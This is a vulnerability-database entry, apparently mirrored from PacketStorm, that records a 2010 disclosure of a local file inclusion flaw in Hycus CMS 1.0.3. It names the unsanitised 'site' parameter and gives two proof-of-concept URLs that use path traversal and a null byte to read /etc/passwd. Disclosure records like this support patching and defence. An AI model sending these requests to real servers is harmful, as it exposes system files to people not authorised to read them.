Sign-up

ID

VAR-E-201012-0405


TITLE

Hycus CMS 1.0.3 Local File Inclusion

Trust: 0.5

sources: PACKETSTORM: 96878

DESCRIPTION

Hycus CMS version 1.0.3 suffers from a local file inclusion vulnerability.

Trust: 0.5

sources: PACKETSTORM: 96878

AFFECTED PRODUCTS

vendor:hycusmodel:cmsscope:eqversion:1.0.3

Trust: 0.5

sources: PACKETSTORM: 96878

EXPLOIT

Vulnerability ID: HTB22737
Reference: http://www.htbridge.ch/advisory/lfi_in_hycus_cms.html
Product: Hycus CMS
Vendor: Hycus Web Development Team ( http://www.hycus.com/ )
Vulnerable Version: 1.0.3
Vendor Notification: 07 December 2010
Vulnerability Type: LFI
Status: Not Fixed, Vendor Alerted, Awaiting Vendor Response
Risk level: High
Credit: High-Tech Bridge SA - Ethical Hacking & Penetration Testing (http://www.htbridge.ch/)

Vulnerability Details:
The vulnerability exists due to failure in the "/index.php" and "admin.php" scripts to properly sanitize user-supplied input in "site" variable.

The following PoC is available:

http://[host]/index.php?site=../../../../../../../etc/passwd%00
http://[host]/admin.php?site=../../../../../../../etc/passwd%00

Trust: 0.5

sources: PACKETSTORM: 96878

EXPLOIT HASH

LOCAL

SOURCE

md5: a72f814cec199b11c5653762527d4818
sha-1: 5ce92f6360886c5f44d72cc07dd2278a6c8bc1c9
sha-256: cc88bafc5432aac7c85feb23b6e65b3f7e75e83db1c316d023f4bf487ad94579
md5: a72f814cec199b11c5653762527d4818

Trust: 0.5

sources: PACKETSTORM: 96878

PRICE

free

Trust: 0.5

sources: PACKETSTORM: 96878

TYPE

file inclusion

Trust: 0.5

sources: PACKETSTORM: 96878

TAGS

tag:exploit

Trust: 0.5

tag:local

Trust: 0.5

tag:file inclusion

Trust: 0.5

sources: PACKETSTORM: 96878

CREDITS

High-Tech Bridge SA

Trust: 0.5

sources: PACKETSTORM: 96878

EXTERNAL IDS

db:PACKETSTORMid:96878

Trust: 0.5

sources: PACKETSTORM: 96878

SOURCES

db:PACKETSTORMid:96878

LAST UPDATE DATE

2022-07-27T09:33:16.901000+00:00


SOURCES RELEASE DATE

db:PACKETSTORMid:96878date:2010-12-21T18:35:03